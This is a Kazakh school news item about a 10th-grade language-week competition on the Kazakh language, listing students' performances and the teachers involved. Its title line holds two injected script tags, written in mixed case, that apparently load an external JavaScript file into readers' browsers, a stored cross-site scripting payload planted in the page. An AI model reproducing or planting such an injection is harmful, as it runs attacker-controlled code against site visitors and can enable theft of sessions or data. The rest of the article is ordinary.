«Тілім менің -тірлігімнің айғағы»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.09.2024

Тілдер апталығы жоспарына орай 13 қыркүйекте   10 сынып оқушылары арасында «Тілім менің -тірлігімнің айғағы» атты сайыс сабағы өткізілді. Сайыс қатысушылары 5  кезеңнен тұратын тапсырмаларды жақсы орындап, мемлекеттік тіл-  қазақ тілін үйренуге деген ықыласын айқын көрсетті. Үйге алдын ала берілген шығармашылық тапсырмаға әр топ өз өнерлерін жоғары деңгейде дайындап, Цындря Мария домбырада «Көңіл толқыны» күйін орындады.  Трусов Ярослав пен Петцольд Иван «Менің атым Қожа» повесінен үзінді көрсетті. Топтардың сайыс тапсырмаларын бағалауда әділқазылар алқасы  тиісті бағасын беріп, әп топқа жеңімпаз дипломын табыстады.  Сайыс жүргізушілері Файфер Ангелина мен Денисенко Данилді де атап өтті. Қазақ тілі мен әдебиеті пәнінің мұғалімдері Журина Сания Молдабековна мен Казизова Гульжихан Борамбаевна   дайындаған іс-шара және оқушылардың сайыс барысындағы еңбегін сынып жетекшісі Андреева Светлана Ивановна жоғары бағалады.

Просмотров: 1007


Пікір қосу



Деректерді қолтаңбаға қосу